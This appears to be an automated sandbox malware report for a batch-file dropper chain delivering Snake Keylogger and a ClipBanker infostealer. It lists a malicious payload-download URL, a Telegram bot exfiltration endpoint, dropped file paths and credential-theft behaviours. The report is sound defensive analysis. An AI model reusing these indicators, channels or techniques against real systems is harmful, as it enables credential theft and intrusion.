                      Source: Yara matchFile source: 29.2.rpkhzpuO.pif.264c3d90.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rpkhzpuO.pif.26485570.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rpkhzpuO.pif.32f75570.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rpkhzpuO.pif.25380000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rpkhzpuO.pif.24ed4e5e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.3.rpkhzpuO.pif.2ffbae98.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000002.2745277954.0000000034B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000003.2772871636.00000000234E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.2448553311.000000002D0DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.2871352037.0000000025380000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.2881899810.0000000026485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2741756362.00000000343B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2718853988.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.2869962358.00000000250F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.2609245491.000000002FFBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.2869415210.0000000024E93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2740855997.0000000032F75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: 13.0.Microsofts.exe.350000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000D.00000000.2475752594.0000000000352000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Microsofts.exe PID: 1664, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information22
                      Scripting                      		1
                      Valid Accounts                      		2
                      Native API                      		22
                      Scripting                      		1
                      DLL Side-Loading                      		11
                      Disable or Modify Tools                      		1
                      OS Credential Dumping                      		1
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		1
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Shared Modules                      		1
                      DLL Side-Loading                      		1
                      Valid Accounts                      		1
                      Deobfuscate/Decode Files or Information                      		LSASS Memory1
                      System Network Connections Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts2
                      Command and Scripting Interpreter                      		1
                      Valid Accounts                      		1
                      Access Token Manipulation                      		3
                      Obfuscated Files or Information                      		Security Account Manager2
                      File and Directory Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		2
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts1
                      Scheduled Task/Job                      		1
                      Scheduled Task/Job                      		311
                      Process Injection                      		2
                      Software Packing                      		NTDS46
                      System Information Discovery                      		Distributed Component Object ModelInput Capture113
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchd21
                      Registry Run Keys / Startup Folder                      		1
                      Scheduled Task/Job                      		1
                      Timestomp                      		LSA Secrets351
                      Security Software Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts21
                      Registry Run Keys / Startup Folder                      		1
                      DLL Side-Loading                      		Cached Domain Credentials51
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                      Masquerading                      		DCSync2
                      Process Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Valid Accounts                      		Proc Filesystem1
                      Application Window Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Access Token Manipulation                      		/etc/passwd and /etc/shadow1
                      System Network Configuration Discovery                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron51
                      Virtualization/Sandbox Evasion                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd311
                      Process Injection                      		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1586924 Sample: PO#3_RKG367.bat Startdate: 09/01/2025 Architecture: WINDOWS Score: 100 92 reallyfreegeoip.org 2->92 94 lwaziacademy.com 2->94 96 2 other IPs or domains 2->96 104 Found malware configuration 2->104 106 Malicious sample detected (through community Yara rule) 2->106 108 Antivirus detection for URL or domain 2->108 112 17 other signatures 2->112 11 cmd.exe 3 2->11         started        15 Oupzhkpr.PIF 2->15         started        17 Oupzhkpr.PIF 2->17         started        signatures3 110 Tries to detect the country of the analysis system (by using the IP) 92->110 process4 file5 88 C:\Users\user\AppData\Local\Temp\x.vbs, ASCII 11->88 dropped 90 C:\Users\user\AppData\Local\Temp\x, ASCII 11->90 dropped 142 Potential malicious VBS script found (has network functionality) 11->142 144 Command shell drops VBS files 11->144 19 x.exe 1 10 11->19         started        24 cscript.exe 2 11->24         started        26 conhost.exe 11->26         started        28 findstr.exe 1 11->28         started        146 Antivirus detection for dropped file 15->146 148 Multi AV Scanner detection for dropped file 15->148 150 Writes to foreign memory regions 15->150 152 Allocates many large memory junks 15->152 30 cmd.exe 15->30         started        32 rpkhzpuO.pif 15->32         started        154 Allocates memory in foreign processes 17->154 156 Sample uses process hollowing technique 17->156 158 Sample is not signed and drops a device driver 17->158 34 cmd.exe 17->34         started        36 rpkhzpuO.pif 17->36         started        signatures6 process7 dnsIp8 98 lwaziacademy.com 41.185.8.252, 443, 49812, 49813 GridhostZA South Africa 19->98 74 C:\Users\Public\Libraries\rpkhzpuO.pif, PE32 19->74 dropped 76 C:\Users\Public\Libraries\Oupzhkpr.PIF, PE32 19->76 dropped 78 C:\Users\Public\Oupzhkpr.url, MS 19->78 dropped 82 2 other malicious files 19->82 dropped 126 Antivirus detection for dropped file 19->126 128 Multi AV Scanner detection for dropped file 19->128 130 Drops PE files with a suspicious file extension 19->130 132 6 other signatures 19->132 38 rpkhzpuO.pif 6 19->38         started        42 cmd.exe 1 19->42         started        44 dllhost.exe 19->44         started        80 C:\Users\user\AppData\Local\Temp\x.exe, PE32 24->80 dropped 46 conhost.exe 30->46         started        48 conhost.exe 34->48         started        file9 signatures10 process11 file12 84 C:\Users\user\AppData\...\Trading_AIBot.exe, PE32 38->84 dropped 86 C:\Users\user\AppData\...\Microsofts.exe, PE32 38->86 dropped 134 Detected unpacking (changes PE section rights) 38->134 136 Detected unpacking (overwrites its own PE header) 38->136 50 Trading_AIBot.exe 5 38->50         started        54 Microsofts.exe 15 2 38->54         started        57 conhost.exe 42->57         started        signatures13 process14 dnsIp15 72 C:\Users\user\AppData\Roaming\...\apihost.exe, PE32 50->72 dropped 114 Antivirus detection for dropped file 50->114 116 Multi AV Scanner detection for dropped file 50->116 118 Machine Learning detection for dropped file 50->118 124 3 other signatures 50->124 59 powershell.exe 50->59         started        62 apihost.exe 50->62         started        64 schtasks.exe 50->64         started        100 checkip.dyndns.com 158.101.44.242, 49860, 80 ORACLE-BMC-31898US United States 54->100 102 reallyfreegeoip.org 104.21.80.1, 443, 49866 CLOUDFLARENETUS United States 54->102 120 Tries to steal Mail credentials (via file / registry access) 54->120 122 Tries to harvest and steal browser information (history, passwords, etc) 54->122 file16 signatures17 process18 signatures19 138 Loading BitLocker PowerShell Module 59->138 66 conhost.exe 59->66         started        68 WmiPrvSE.exe 59->68         started        140 Antivirus detection for dropped file 62->140 70 conhost.exe 64->70         started        process20

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      PO#3_RKG367.bat24%ReversingLabsScript-BAT.Trojan.Malgent

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\Public\Libraries\Oupzhkpr.PIF100%AviraHEUR/AGEN.1326019
                      C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe100%AviraTR/Dropper.Gen
                      C:\Users\user\AppData\Roaming\ACCApi\apihost.exe100%AviraTR/Dropper.Gen
                      C:\Users\user\AppData\Local\Temp\x.exe100%AviraHEUR/AGEN.1326019
                      C:\Users\user\AppData\Local\Temp\Microsofts.exe100%AviraTR/ATRAPS.Gen
                      C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\Microsofts.exe100%Joe Sandbox ML
                      C:\Users\Public\Libraries\Oupzhkpr.PIF47%ReversingLabsWin32.Trojan.DBatLoader
                      C:\Users\Public\Libraries\rpkhzpuO.pif3%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\Microsofts.exe91%ReversingLabsByteCode-MSIL.Spyware.Snakekeylogger
                      C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe79%ReversingLabsByteCode-MSIL.Infostealer.ClipBanker
                      C:\Users\user\AppData\Local\Temp\x.exe47%ReversingLabsWin32.Trojan.DBatLoader

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://lwaziacademy.com/0%Avira URL Cloudsafe
                      https://lwaziacademy.com/wps/200_Oupzhkprnvw100%Avira URL Cloudmalware
                      https://lwaziacademy.com/wps/2000%Avira URL Cloudsafe
                      https://lwaziacademy.com:443/wps/200_Oupzhkprnvw100%Avira URL Cloudmalware

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      reallyfreegeoip.org
                      		104.21.80.1
                      		truefalse
                        		high
                        lwaziacademy.com
                        		41.185.8.252
                        		truetrue
                          		unknown
                          checkip.dyndns.com
                          		158.101.44.242
                          		truefalse
                            		high
                            checkip.dyndns.org
                            		unknown
                            		unknownfalse
                              		high

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              https://reallyfreegeoip.org/xml/8.46.123.189false
                                		high
                                https://lwaziacademy.com/wps/200_Oupzhkprnvwtrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://checkip.dyndns.org/false
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://nuget.org/NuGet.exepowershell.exe, 0000000E.00000002.2580997987.0000000005356000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://sectigo.com/CPS0x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://ocsp.sectigo.com0x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000E.00000002.2558666717.0000000004446000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000E.00000002.2558666717.0000000004446000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000E.00000002.2558666717.0000000004446000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://lwaziacademy.com:443/wps/200_Oupzhkprnvwx.exe, 00000006.00000002.2450193992.0000000000609000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://reallyfreegeoip.orgdMicrosofts.exe, 0000000D.00000002.4634725765.00000000026DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.microsoft.copowershell.exe, 0000000E.00000002.2654422100.0000000007C73000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://contoso.com/Licensepowershell.exe, 0000000E.00000002.2580997987.0000000005356000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://contoso.com/Iconpowershell.exe, 0000000E.00000002.2580997987.0000000005356000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://reallyfreegeoip.org/xml/8.46.1dMicrosofts.exe, 0000000D.00000002.4634725765.00000000026BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://checkip.dyndns.orgMicrosofts.exe, 0000000D.00000002.4634725765.0000000002641000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000D.00000002.4634725765.00000000026BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://github.com/Pester/Pesterpowershell.exe, 0000000E.00000002.2558666717.0000000004446000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://lwaziacademy.com/wps/200x.exe, 00000006.00000002.2508181748.0000000020B7D000.00000004.00001000.00020000.00000000.sdmptrue
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://reallyfreegeoip.org/xml/8.46.123.189lMicrosofts.exe, 0000000D.00000002.4634725765.00000000026BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://checkip.dyndns.comdMicrosofts.exe, 0000000D.00000002.4634725765.00000000026BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://aka.ms/pscore6lBpowershell.exe, 0000000E.00000002.2558666717.00000000042F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://lwaziacademy.com/x.exe, 00000006.00000002.2450193992.00000000005B0000.00000004.00000020.00020000.00000000.sdmptrue
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://checkip.dyndns.org/qMicrosofts.exe, 0000000D.00000000.2475752594.0000000000352000.00000002.00000001.01000000.0000000D.sdmpfalse
                                                                            		high
                                                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000E.00000002.2558666717.0000000004446000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://contoso.com/powershell.exe, 0000000E.00000002.2580997987.0000000005356000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://nuget.org/nuget.exepowershell.exe, 0000000E.00000002.2580997987.0000000005356000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://reallyfreegeoip.orgMicrosofts.exe, 0000000D.00000002.4634725765.00000000026DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://checkip.dyndns.orgdMicrosofts.exe, 0000000D.00000002.4634725765.00000000026BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://reallyfreegeoip.orgMicrosofts.exe, 0000000D.00000002.4634725765.0000000002671000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000D.00000002.4634725765.00000000026BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://checkip.dyndns.comMicrosofts.exe, 0000000D.00000002.4634725765.00000000026BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://checkip.dyndns.org/dMicrosofts.exe, 0000000D.00000002.4634725765.00000000026BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMicrosofts.exe, 0000000D.00000002.4634725765.0000000002641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2558666717.00000000042F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://ocsp.sectigo.com0Cx.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://api.telegram.org/bot-/sendDocument?chat_id=Microsofts.exe, 0000000D.00000000.2475752594.0000000000352000.00000002.00000001.01000000.0000000D.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.pmail.com0x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020B12000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2445124760.000000007EB4A000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2529595198.0000000021DFB000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2444599490.0000000021D51000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000019.00000002.2779535012.0000000002662000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://reallyfreegeoip.org/xml/Microsofts.exe, 0000000D.00000002.4634725765.0000000002671000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000D.00000000.2475752594.0000000000352000.00000002.00000001.01000000.0000000D.sdmp, Microsofts.exe, 0000000D.00000002.4634725765.00000000026BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high

                                                                                                      World Map of Contacted IPs

                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs

                                                                                                      Public IPs

                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      41.185.8.252
                                                                                                      		lwaziacademy.comSouth Africa
                                                                                                      		36943GridhostZAtrue
                                                                                                      158.101.44.242
                                                                                                      		checkip.dyndns.comUnited States
                                                                                                      		31898ORACLE-BMC-31898USfalse
                                                                                                      104.21.80.1
                                                                                                      		reallyfreegeoip.orgUnited States
                                                                                                      		13335CLOUDFLARENETUSfalse

                                                                                                      General Information

                                                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                                                      Analysis ID:1586924
                                                                                                      Start date and time:2025-01-09 19:08:28 +01:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 13m 55s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                      Number of analysed new started processes analysed:31
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:0
                                                                                                      Technologies:
